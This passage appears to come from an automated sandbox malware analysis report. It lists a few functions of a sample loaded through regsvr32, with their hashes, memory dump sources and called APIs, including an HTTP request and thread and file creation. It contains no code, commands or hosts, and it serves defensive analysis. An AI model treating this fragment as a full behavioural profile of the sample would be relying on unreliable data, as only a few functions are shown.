                                    • Instruction Fuzzy Hash: B741E57050C7888FD778DF28D08579AB7E0FB98355F504A2EE88DC7256DB749844CB46
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180008E80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 93networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: HttpOpenRequest
                                    • String ID: /w?
                                    • API String ID: 1984915467-2883141396
                                    • Opcode ID: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                    • Instruction ID: 62644a68fcffc2b577fce7b544f847534cb1236eece225f9d3186d00a7134b33
                                    • Opcode Fuzzy Hash: 818aa95858f7ed11817eb131aa565176550a369bd62d65159787a93bff5cf428
                                    • Instruction Fuzzy Hash: 82414B7051CB848BDBA4DF18D08979AB7E0FB98315F10495EE48CC7296DB789888CB87
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 000000018002A3E0 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID:
                                    • API String ID: 2039140958-0
                                    • Opcode ID: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                    • Instruction ID: a7a4fb0533c75889cab630729e0b0d9f2a38dc76e554bad22bb68829b1652ebe
                                    • Opcode Fuzzy Hash: bf946f7280dffac1a3cb664117863ae64736b63a5e6a79a2235ba17386e3f57f
                                    • Instruction Fuzzy Hash: AB412C705187808FEB78DF18D48A79AB7E1FB98305F104A5DE88DC7396CB789844CB46
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180010B1C Relevance: 1.6, APIs: 1, Instructions: 96fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                    • Instruction ID: ac55bdb39f8b4cda225445b8a297a6fe4d60e7d5d7af93594b9ed55c6b81ea6e
                                    • Opcode Fuzzy Hash: 36e83bb09eec7ec6f2f1980e7d227db28432cb7784451cfb87e32bb48f6cd236
                                    • Instruction Fuzzy Hash: B941047061C7848FC7A8DF18D08579AB7E0FB98304F10895EE88DC7256DB709988CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0000000180025B1C Relevance: 1.6, APIs: 1, Instructions: 82threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.1215293806.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_4_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateThread
                                    • String ID:
                                    • API String ID: 2422867632-0
                                    • Opcode ID: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                    • Instruction ID: 3f2c7be81e2b52442973c9c793e7ddf499cdb82d70e50cd1cb8991bbce4e9b94
                                    • Opcode Fuzzy Hash: 7af62da62a3dd359fefdd9c6a8904522cdd90ae6c0ef31e605b5c3566544960a
                                    • Instruction Fuzzy Hash: 4F316970A1CB848FD768DF28D48A75AB7E0FB98304F100A1EF588C7252CB74D904CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%